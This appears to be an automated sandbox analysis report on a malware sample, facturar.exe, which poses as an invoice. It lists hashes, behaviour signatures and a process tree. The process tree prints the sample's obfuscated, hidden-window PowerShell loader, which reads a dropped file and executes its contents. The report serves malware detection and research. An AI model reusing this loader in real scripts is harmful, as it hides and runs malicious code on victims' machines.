Overview

overview

10

Static

static

3

facturar.exe

windows7-x64

8

facturar.exe

windows10-2004-x64

10

dydsmnstres.ps1

windows7-x64

3

dydsmnstres.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    94s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    17/02/2025, 11:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    facturar.exe

  • Size

    781KB

  • MD5

    dc6405171400ba31490159b7e59eae0b

  • SHA1

    59ac7ab360bda219ab6aa5b8b57fd5d3a1f7ec73

  • SHA256

    8e533c355130e312b4bdecd237c49d50cf8d12c5f88fbe991ecaac462f84c9a6

  • SHA512

    15944b966bad130dece39b2b958073b5c63806f8f8441e193af481c2349bd896d2f599bc9dc82ca4a5233802d225245ea5e1b459a6c9033485189be7a7a7ba08

  • SSDEEP

    12288:2tlyuHaQfKrVOnQlp6UV/ytzlI/Xr+urZTbq9pK0R6iyNc3pipkyfGSN:AbQknM6UJylurZTG9pK+65c5yfFN

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\facturar.exe
    "C:\Users\Admin\AppData\Local\Temp\facturar.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1496
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Juletrslyset=Get-Content -Raw 'C:\Users\Admin\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\dydsmnstres.Akk';$sjalsmnsterets=$Juletrslyset.SubString(5587,3);.$sjalsmnsterets($Juletrslyset) "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2368

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\vitrifacture.txt
    Filesize

    6KB

    MD5

    9361066f2eab82730a5f698f735ecf25

    SHA1

    7279f63469efc0aaf9fcf70d8accd623f7d5ac6b

    SHA256

    4976ee2c2c27f507b578f55c6323533dee7b47e25877f8f51398ad34545497d0

    SHA512

    f706fb6dbd5596631ae35a2f6b8fd0d723bd46e6f646383245c470f57c2b3cee2a82f4695e24d9e0a2f7382156eaad4ae218443069c962b247015ec8429583ee

    Download Submit

  • memory/2368-18-0x0000000073F21000-0x0000000073F22000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2368-20-0x0000000073F20000-0x00000000744CB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2368-19-0x0000000073F20000-0x00000000744CB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2368-21-0x0000000073F20000-0x00000000744CB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2368-22-0x0000000073F20000-0x00000000744CB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2368-23-0x0000000073F20000-0x00000000744CB000-memory.dmp

    Filesize

    5.7MB

    Download